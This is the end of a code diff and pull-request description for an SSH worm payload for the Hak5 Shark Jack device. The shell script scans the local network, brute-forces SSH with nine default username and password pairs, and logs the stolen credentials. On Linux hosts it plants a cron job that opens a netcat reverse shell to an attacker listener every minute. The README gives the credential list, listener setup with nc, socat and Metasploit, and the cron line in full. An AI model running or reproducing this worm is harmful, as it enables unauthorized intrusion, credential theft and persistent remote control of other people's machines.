+          sshpass -p "$pass" ssh -o ConnectTimeout=2 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null "$user@$host" "(crontab -l 2>/dev/null; echo '* * * * * nc $LISTENER_IP_CLEAN $LISTENER_PORT -e /bin/sh 2>/dev/null &') | crontab -" > /dev/null 2>&1
+          log_both "[+] Worm deployed (Linux/cron) to $host"
+        else
+          # Windows or unknown - just log credentials, no automatic reverse shell
+          log_both "[!] Windows/Unknown OS detected - cron not available"
+          log_both "[!] SSH access available: $user:$pass @ $host"
+        fi
+        
+        log_both ""
+        
+        # Break out of credentials loop - move to next host
+        break
+      fi
+    done
+    
+    # If compromised, skip to next host
+    if [ $COMPROMISED_FLAG -eq 1 ]; then
+      continue
+    fi
+  done
+  
+  log_both ""
+  log_both "=== Scan Complete ==="
+  log_both "Hosts Scanned: $HOST_COUNT"
+  log_both "Hosts Compromised: $COMPROMISED"
+  log_both "Loot Location: $LOOT_BASE/"
+  log_both ""
+  
+  LED READY
+  ALERT "Worm Active\n\nScanned: $HOST_COUNT hosts\nCompromised: $COMPROMISED\n\nListener: $LISTENER_HOST:$LISTENER_PORT" 2 false
+}
+
+view_compromised() {
+  if [ -f "$LOOT_BASE/compromised_hosts.log" ]; then
+    SHOW_PAYLOAD_LOG "$LOOT_BASE/compromised_hosts.log"
+  else
+    ALERT "No compromised hosts logged yet" 2 false
+  fi
+}
+
+view_worm_log() {
+  if [ -f "$LOOT_BASE/worm_session_"* ]; then
+    LATEST=$(ls -t $LOOT_BASE/worm_session_* 2>/dev/null | head -1)
+    if [ -n "$LATEST" ]; then
+      SHOW_PAYLOAD_LOG "$LATEST"
+    else
+      ALERT "No worm logs found" 2 false
+    fi
+  else
+    ALERT "No worm logs found" 2 false
+  fi
+}
+
+stop_worm() {
+  LOG "Network Worm: Stopping..."
+  
+  pkill -9 nmap 2>/dev/null
+  pkill -9 ssh 2>/dev/null
+  rm -f /tmp/worm_payload.sh
+  
+  LOG "Network Worm: Stopped"
+  LED FINISH
+  ALERT "Network Worm Stopped" 2 false
+}
+
+setup_payload
+initialize_menu
+ALERT "Network Worm\nv1.0\nAutonomous Propagation\nby Hackazillarex\n← to Start" -1 false true
+START_MENU
+
+# Cleanup
+pkill -9 nmap 2>/dev/null
+pkill -9 ssh 2>/dev/null
+
+LED FINISH


### PR DESCRIPTION
# Network Worm v1.0

**Autonomous SSH Network Propagation Tool for Hak5 Shark Jack Display**

A sophisticated network scanning and SSH brute-force payload that identifies live hosts, compromises them with weak credentials, and deploys persistent reverse shells via cron jobs.

## Features

- **Network Discovery**: Fast nmap-based host scanning across network segments
- **SSH Brute Force**: Automated credential testing with 9 common username/password combinations
- **OS Detection**: Identifies Linux vs Windows targets and deploys appropriate payloads
- **Persistent Reverse Shell**: Cron-based reverse shell on Linux targets (automatic callback every minute)
- **Credential Logging**: Complete log of all compromised hosts with timestamps
- **Interactive Menu System**: User-friendly menu for configuration and monitoring
- **Comprehensive Logging**: Detailed session logs and error tracking

## Prerequisites

### Shark Jack Display
- Hak5 Shark Jack Display device
- Network connectivity to target network
- **sshpass** installed (required)
  ```bash
  opkg update
  opkg install sshpass
  ```

### Target Network
- Linux/Unix targets with SSH enabled
- Weak or default credentials (root:root, admin:admin, test:test, etc.)
- Network access from Shark Jack to target devices

### Listener Server (Attacker)
- Netcat or socat for reverse shell handling
- Open port for incoming connections (default: 4444)

## Installation

1. Copy `payload.sh` to Shark Jack:
   ```bash
   scp payload.sh root@172.16.24.1:/root/library/my_payloads/Network_Worm/payload.txt
   ```

2. Ensure sshpass is installed on Shark Jack:
   ```bash
   ssh root@172.16.24.1
   opkg update
   opkg install sshpass
   ```

## Usage

### Basic Workflow

1. **Start the payload** on Shark Jack Display
2. **Configure Listener Host** - Enter your C2 server IP and port
3. **Start Worm Propagation** - Payload will:
   - Scan the network for live hosts
   - Attempt SSH brute force on each host
   - Detect target OS (Linux/Windows)
   - Deploy persistent reverse shell to Linux targets
   - Log all compromised credentials

### Menu Options

- **Configure Listener Host**: Set C2 callback IP and port
- **Start Worm Propagation**: Execute the attack
- **View Compromised Hosts**: Display list of compromised systems with credentials
- **View Worm Log**: Detailed session logs
- **Stop Worm**: Cleanup and stop running processes
- **Quit**: Exit payload

## Listener Setup

### Single Session (Simple)
```bash
nc -lvnp 4444
```

### Multiple Sessions with socat
```bash
socat TCP-LISTEN:4444,reuseaddr EXEC:/bin/bash
```

### Multiple Sessions with Metasploit
```bash
msfconsole
> use exploit/multi/handler
> set PAYLOAD linux/x86/shell_reverse_tcp
> set LHOST 10.0.0.222
> set LPORT 4444
> exploit -j
```

## How It Works

### Scanning Phase
1. Detects Shark Jack's IP and network range
2. Determines if single-device or full-network mode
3. Performs nmap ping scan to find live hosts
4. Filters out Shark Jack's own IP

### Exploitation Phase
For each discovered host:
1. Tests 9 common SSH credentials
2. On successful login:
   - Detects OS type (Linux/Windows)
   - Extracts hostname/IP for logging
   - For Linux: Deploys cron-based reverse shell
   - For Windows: Logs credentials only

### Persistence
Linux targets get a cron job:
```bash
* * * * * nc 10.0.0.222 4444 -e /bin/sh 2>/dev/null &
```
This executes every minute and connects back to your listener with shell access.

## Default Credentials Tested

The payload attempts these credential combinations:
- root:root
- root:password
- root:12345
- admin:admin
- admin:password
- admin:12345
- test:test
- oracle:oracle
- postgres:postgres

## Logging

All activities logged to `/root/loot/network_worm/`:

- **compromised_hosts.log**: List of successfully compromised hosts with credentials
- **worm_session_TIMESTAMP.txt**: Detailed session log with all scan results

## Payload Configuration

Edit these values in the script to customize:

```bash
LISTENER_HOST="010.000.000.222"  # Your C2 server (padded IP format)
LISTENER_PORT="4444"              # Your listener port
LOOT_BASE="/root/loot/network_worm"  # Local loot storage
```

## Important Notes

### IP Address Format
Listener IP uses padded format (e.g., `010.000.000.222`) for menu consistency. The payload automatically strips leading zeros before deployment, converting to standard format (e.g., `10.0.0.222`).

### Reverse Shell Callback
- Linux targets callback every minute via cron
- Ensure your listener is running BEFORE or immediately WHEN worms execute
- Multiple compromised hosts can connect to same listener on same port

### Cleanup
To remove deployed cron jobs from compromised machines:
```bash
ssh root@<target_ip>
crontab -r
```

## Troubleshooting

### Scan finds 0 hosts
- Verify network connectivity from Shark Jack
- Check network range (default: /24 from Shark Jack's subnet)
- Verify hosts are actually live and reachable

### No reverse shells connecting
- Verify listener is running on configured IP/port
- Check firewall allows inbound on listener port
- Verify IP address format (should be converted from padded to standard)
- Check compromised host can reach listener IP

## Security Considerations

- **Loud**: This payload generates significant network traffic and logs
- **Credentials**: Default credentials may be changed in real environments
- **Detection**: Brute force attempts and cron jobs are easily detectable
- **Persistence**: Cron jobs remain until manually removed

## Disclaimer

This payload is for authorized security testing only. Unauthorized access to computer systems is illegal. Always obtain written permission before testing.

## Author

Hackazillarex

## License

Use only on authorized networks with explicit permission.

